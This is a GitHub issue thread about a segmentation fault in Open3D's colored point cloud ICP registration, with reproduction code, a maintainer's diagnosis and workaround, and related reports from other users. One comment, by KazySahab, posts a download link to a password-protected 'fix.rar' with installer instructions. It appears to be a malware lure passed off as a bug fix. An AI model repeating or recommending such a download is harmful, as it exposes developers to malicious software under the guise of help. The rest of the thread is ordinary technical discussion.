### ISSUE TITLE
Segmentation Fault for Colored Point Cloud Registration

### ISSUE THREAD

**Issue by aenoca** [isl-org/Open3D#6935]
### Checklist

- [X] I have searched for [similar issues](https://github.com/isl-org/Open3D/issues).
- [X] For Python issues, I have tested with the [latest development wheel](https://www.open3d.org/docs/latest/getting_started.html#development-version-pip).
- [X] I have checked the [release documentation](https://www.open3d.org/docs/release/) and the [latest documentation](https://www.open3d.org/docs/latest/) (for `main` branch).

### Describe the issue

I have been trying to fit two colored point clouds together using colored icp and it returns a segfault every single time. I know some other issue has brought up a similar issue but for the general icp_registration.

### Steps to reproduce the bug

```python
import open3d as o3d
import numpy as np

cylinder = o3d.geometry.TriangleMesh.create_cylinder(radius=0.05, height=0.3, resolution=20, split=20)
cylinder.paint_uniform_color([0.5, 0.5, 0.5])
points = cylinder.sample_points_uniformly(3000)

# assign color to the points
points.colors = o3d.utility.Vector3dVector([np.random.rand(3) for i in range(len(points.points))])

# Visualize the pointcloud
# o3d.visualization.draw_geometries([points])

# color the cylinder with the same color as the pointcloud
kdtree = o3d.geometry.KDTreeFlann(cylinder)

# For each point in the point cloud, find the nearest vertex on the mesh
print(len(points.points), len(cylinder.vertices))
for i, point in enumerate(points.points):
    _, idx, _ = kdtree.search_knn_vector_3d(point, 1)  # KNN search for 1 nearest neighbor
    nearest_vertex_index = idx[0]

    # print(nearest_vertex_index, i, len(self.pc_colors), len(self.mesh.vertex_colors))
    
    # Transfer the color from the point cloud to the corresponding mesh vertex
    # print(idx, i)
    cylinder.vertex_colors[nearest_vertex_index] = points.colors[i]

# Visualize the colored mesh
# o3d.visualization.draw_geometries([cylinder])

# sample new points from the cylinder
new_points = cylinder.sample_points_uniformly(2500)
# rotate the cylinder
R = cylinder.get_rotation_matrix_from_xyz((0, 0, np.pi/12))
new_points.points = o3d.utility.Vector3dVector(np.asarray(new_points.points) @ R.T)

# display the new points

voxel_size = 0.001
# downsample the pointclouds
points = points.voxel_down_sample(voxel_size)
new_points = new_points.voxel_down_sample(voxel_size)
new_points.estimate_normals()
o3d.visualization.draw_geometries([points, new_points])

result = o3d.pipelines.registration.registration_icp(
    points, new_points, max_correspondence_distance=1.5*voxel_size, init=np.eye(4),
    estimation_method=o3d.pipelines.registration.TransformationEstimationForColoredICP(),
criteria=o3d.pipelines.registration.ICPConvergenceCriteria(relative_fitness=1e-6,
                                                          relative_rmse=1e-6,
                                                          max_iteration=300))

print(result.transformation)
```

### Error message

Segmentation fault (core dumped)

### Expected behavior

A print of the transformation from one pointcloud to the other (if it has converged)

### Open3D, Python and System information

```markdown
- Operating system: Ubuntu 22.04
- Python version: Python 3.10.12
- Open3D version: 0.18.0
- System architecture: x86 
- How did you install Open3D?: pip
```

**Comment by KazySahab** [comment]
Download 
https://www.mediafire.com/file/czdodbba054p738/fix.rar/file
password: changeme
In the installer menu, select "gcc."

**Comment by nicolaloi** [comment]
Theoretically, you could use either `registration_colored_icp` or `registration_icp`. But indeed there is a bug when using `registration_icp` with `TransformationEstimationForColoredICP()`, it seems the colored point cloud is not initialized correctly. I will open a PR, but you can already use `registration_colored_icp`.

**Comment by aenoca** [comment]
Okay great! I'll try that one out.

**Comment by macawi** [comment]
Whats your numpy version? Depending on your package manager you may have installed numpy>=2.0.0 which leads to segfaults in multiple occasions (see #6840). In this case downgrading numpy to e.g. 1.26.4 may solve this issue.

**Comment by kanao-contineu** [comment]
I've been getting seg fault when I do 

`import open3d as o3d
import numpy as np

pcl_path = '<path-to-pointcloud>'
pcd = o3d.io.read_point_cloud(pcl_path)

voxel_size = 0.3
min_neighbours = 5

pcd_downsample = pcd.voxel_down_sample(voxel_size)
pcd_downsample.points = o3d.utility.Vector3dVector(np.asarray(pcd_downsample.points).copy())

kdtree = o3d.geometry.KDTreeFlann(pcd_downsample)
# points = np.asarray(pcd_downsample.points)


[k,idx,_] = kdtree.search_radius_vector_3d(pcd_downsample.points[0], 0.3)

[k1, idx1, d] = kdtree.search_knn_vector_3d(pcd_downsample.points[0], 5)`

I've noticed that this surprisingly works when run in a notebook but crashes when I run it as a script. I've been using registration_coloured for a while and I think the problem is with the kdtree

**Comment by kanao-contineu** [comment]
Hello, 

I was doing something similar and noticed that this function has something similar with mine and I was also getting a segmentation fault. 
```

import open3d as o3d
import numpy as np

pcl_path = '<>'
pcd = o3d.io.read_point_cloud(pcl_path)

voxel_size = 0.3
min_neighbours = 5

pcd_downsample = pcd.voxel_down_sample(voxel_size)
pcd_downsample.points = o3d.utility.Vector3dVector(np.asarray(pcd_downsample.points).copy())

kdtree = o3d.geometry.KDTreeFlann(pcd_downsample)
# points = np.asarray(pcd_downsample.points)


[k,idx,_] = kdtree.search_radius_vector_3d(pcd_downsample.points[0], 0.3)

[k1, idx1, d] = kdtree.search_knn_vector_3d(pcd_downsample.points[0], 5)
```

It works with a jupyter notebook but it crashes when its run on my terminal. Not sure what's going on but @aenoca can you maybe try using a vscode notebook and checking if it works. This might be a complete goof up from my side but I'm very confused 

My sys information is the same as above except py3.9
